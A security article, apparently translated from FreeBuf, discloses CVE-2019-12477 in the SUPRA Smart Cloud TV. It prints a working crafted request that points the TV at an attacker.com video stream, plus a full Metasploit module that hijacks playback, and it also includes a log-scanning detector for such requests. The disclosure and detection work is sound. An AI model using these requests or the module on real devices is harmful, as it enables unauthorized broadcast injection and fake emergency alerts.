
Bug-hunting story | How I played around with the SUPRA Smart Cloud TV

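Recently, Dubai-based security researcher Dhiraj Mishra found that the SUPRA Smart Cloud TV has a broadcast hijacking vulnerability (CVE-2019-12477): an attacker on the same wireless network as the TV can send forged playback requests to the device and insert arbitrary video content or fake broadcast messages.

SUPRA Smart Cloud TVs are reportedly very popular in Russia and Eastern Europe, and are sold mainly through online channels to Russia, China, the UAE and other countries. The flaw Mishra found lies in the TV's stream-fetching function 'openLiveURL', which the SUPRA TV uses to obtain the streaming content it plays. Mishra found that this function lacks the necessary authentication, authorization and session management. An attacker can trigger the vulnerability by sending a crafted request to a static URL, bypassing authorization checks and injecting a remote video stream file into the playback mechanism so that arbitrary video content is played.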

Vulnerability details

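Dhiraj Mishra disclosed that he ultimately found the vulnerability through source code review, application enumeration and sending requests. The vulnerable endpoint is /remote/media_control?action=setUri&uri=URI on the server side, and the vulnerable function is openLiveTV(url). The following is a source snippet of the openLiveTV(url) function: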

    function openLiveTV(url)
    {
        // Passes the stream URL to /remote/media_control; nothing here authenticates the caller.
        $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},
            function (data, textStatus){
                if("success"==textStatus){
                    alert(textStatus);
                }else
                {
                    alert(textStatus);
                }
            });
    }

The crafted request that inserts arbitrary video playback on the TV:

    GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
    Host: 192.168.1.155
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

Of course, the request can also be sent directly to a SUPRA smart TV on the same wireless network in the following way, which achieves the same insertion effect:

    http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

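Although the playback URL above expects a video in .m3u8 format, we can send a similar request with a `curl -v -X GET` command. Based on the analysis above, a malicious attacker can insert arbitrary video on a SUPRA smart TV without any permission restriction. In a serious case, an attacker could use this to spread inflammatory propaganda carrying false information or protest content and cause public panic.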
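The request format shown above can be matched in network or proxy logs on the TV's segment. The following is an added example, not code from the article or the researcher; the log line format, the two allowlists and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log format: <source ip> -> <tv ip> "<METHOD> <target> HTTP/x.y"
LINE_RE = re.compile(
    r'^(?P<src>\S+) -> (?P<dst>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"$')

TRUSTED_CONTROLLERS = {"192.168.1.10"}       # assumed: hosts allowed to drive the TV
TRUSTED_STREAM_HOSTS = {"iptv.example.net"}  # assumed: legitimate stream origins

def inspect(line):
    """Return a finding for a media_control setUri request, or None for other traffic."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    target = urlsplit(m["target"])
    if target.path != "/remote/media_control":
        return None
    params = parse_qs(target.query)
    # The article shows both action/uri and m_action/m_uri parameter names.
    action = (params.get("action") or params.get("m_action") or [""])[0]
    uri = (params.get("uri") or params.get("m_uri") or [""])[0]
    if action != "setUri":
        return None
    stream_host = (urlsplit(uri).hostname or "").lower()
    reasons = []
    if m["src"] not in TRUSTED_CONTROLLERS:
        reasons.append("untrusted source")
    if stream_host not in TRUSTED_STREAM_HOSTS:
        reasons.append("unknown stream host")
    return {"src": m["src"], "tv": m["dst"], "stream_host": stream_host,
            "reasons": reasons, "alert": bool(reasons)}

def scan(lines):
    """Return only the findings that should raise an alert."""
    return [f for f in map(inspect, lines) if f and f["alert"]]

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '192.168.1.77 -> 192.168.1.155 "GET /remote/media_control?action=setUri'
    '&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1"',
    '192.168.1.10 -> 192.168.1.155 "GET /remote/media_control?action=setUri'
    '&uri=http://iptv.example.net/live.m3u8 HTTP/1.1"',
    '192.168.1.10 -> 192.168.1.155 "GET /index.html HTTP/1.1"',
    '192.168.1.10 -> 192.168.1.155 "GET /remote/media_control?m_action=setUri'
    '&m_uri=http://attacker.com/x.m3u8&m_type=video/* HTTP/1.1"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
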

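Although the vulnerability was found some time ago, I really could not reach the SUPRA smart TV vendor, so to this day it remains unpatched. The following PoC video shows a SUPRA smart TV playing a Steve Jobs speech when the attacker uses the vulnerability above to suddenly insert a forged US Emergency Alert System message: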

Metasploit (msf) exploit module

    ##
    ##
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer

      def initialize(info = {})
        super(update_info(info,
          'Name' => 'Supra Smart Cloud TV Remote File Inclusion',
          'Description' => %q{
            This module exploits an unauthenticated remote file inclusion which
            exists in Supra Smart Cloud TV. The media control for the device doesn't
            have any session management or authentication. Leveraging this, an
            attacker on the local network can send a crafted request to broadcast a
            fake video.
          },
          'Author' => [
            'Dhiraj Mishra', # Discovery, PoC, and module
            'wvu' # Module
          ],
          'References' => [
            ['CVE', '2019-12477'],
            ['URL', '']
          ],
          'DisclosureDate' => '2019-06-03',
          'License' => MSF_LICENSE
        ))

        deregister_options('URIPATH')
      end

      def run
        start_service('Path' => '/')

        print_status("Broadcasting Epic Sax Guy to #{peer}")
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/remote/media_control',
          'encode_params' => false,
          'vars_get' => {
            'action' => 'setUri',
            'uri' => get_uri + 'epicsax.m3u8'
          }
        )

        unless res && res.code == 200 && res.body.include?('OK')
          print_error('No doo-doodoodoodoodoo-doo for you')
          return
        end

        # Sleep time calibrated using successful pcap
        print_good('Doo-doodoodoodoodoo-doo')
        print_status('Sleeping for 10s serving .m3u8 and .ts files...')
        sleep(10)
      end

      def on_request_uri(cli, request)
        dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')

        files = {
          '/epicsax.m3u8' => 'application/x-mpegURL',
          '/epicsax0.ts' => 'video/MP2T',
          '/epicsax1.ts' => 'video/MP2T',
          '/epicsax2.ts' => 'video/MP2T',
          '/epicsax3.ts' => 'video/MP2T',
          '/epicsax4.ts' => 'video/MP2T'
        }

        file = request.uri

        unless files.include?(file)
          vprint_error("Sending 404 for #{file}")
          return send_not_found(cli)
        end

        data = File.read(File.join(dir, file))

        vprint_good("Sending #{file}")
        send_response(cli, data, 'Content-Type' => files[file])
      end
    end

*Source: inputzero; compiled by clouds. When reposting, please credit FreeBuf.COM
